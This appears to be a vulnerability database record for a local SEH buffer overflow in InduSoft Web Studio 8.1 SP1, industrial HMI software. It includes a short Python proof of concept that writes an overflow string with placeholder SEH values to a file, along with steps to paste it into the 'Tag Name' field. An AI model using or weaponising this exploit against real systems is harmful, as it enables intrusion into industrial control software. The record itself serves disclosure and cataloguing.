ID
VAR-E-201809-0404
TITLE
InduSoft Web Studio 8.1 SP1 - Tag Name Buffer Overflow (SEH) Exploit
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | indusoft | model: | web studio sp1 | scope: | eq | version: | 8.1 | Trust: 0.6 |
EXPLOIT
# Exploit Title: InduSoft Web Studio 8.1 SP1 - 'Tag Name' Buffer Overflow (SEH)
# Discovery by: Luis Martinez
# Vendor Homepage: http://www.indusoft.com/
# Software Link: http://www.indusoft.com/Products-Downloads
# Tested Version: 8.1 SP1
# Vulnerability Type: Local Buffer Overflow (SEH Unicode)
# Tested on OS: Windows 10 Pro x64 en
# Steps to Produce the Local Buffer Overflow (SEH Unicode):
# 1.- Run python code: InduSoft_Web_Studio_8.1.py
# 2.- Open InduSoft_Web_Studio_8.1.txt and copy content to clipboard
# 3.- Open IWS v8.1 InduSoft Web Studio
# 4.- Home
# 5.- Paste ClipBoard on "Tag Name"
#!/usr/bin/env python
nSEH = "\x42\x42"
SEH = "\x43\x43"
buffer = "\x41" * 1042 + nSEH + SEH
f = open ("InduSoft_Web_Studio_8.1.txt", "w")
f.write(buffer)
f.close()
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Tag Name Buffer Overflow (SEH) Exploit
Trust: 0.6
EXTERNAL IDS
| db: | 0DAYTODAY | id: | 31092 | Trust: 0.6 |
| db: | EDBNET | id: | 99325 | Trust: 0.6 |
REFERENCES
| url: | https://0day.today/exploits/31092 | Trust: 0.6 |
SOURCES
| db: | EDBNET | id: | 99325 |
LAST UPDATE DATE
2022-07-27T09:39:53.850000+00:00
SOURCES RELEASE DATE
| db: | EDBNET | id: | 99325 | date: | 2018-09-16T00:00:00 |